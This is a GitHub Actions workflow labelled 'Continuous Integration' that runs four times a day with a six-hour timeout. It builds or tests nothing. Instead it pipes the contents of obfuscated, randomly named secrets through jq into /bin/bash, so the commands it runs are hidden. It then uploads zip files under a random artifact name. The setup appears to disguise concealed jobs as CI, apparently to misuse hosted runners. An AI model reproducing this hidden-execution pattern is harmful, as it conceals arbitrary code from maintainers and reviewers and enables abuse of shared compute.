name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '52 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          vuky7858: ${{ secrets.vuky7858 }}
        run: |
          printf '%s' "$vuky7858" | jq -r .bg678 | /bin/bash
          printf '%s' "$aas7454" | jq -r .tkk37 | /bin/bash
          printf '%s' "$xorhx912" | jq -r .qexvm6691 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: IqFUZA5m
          path: "*.zip"
          retention-days: 1
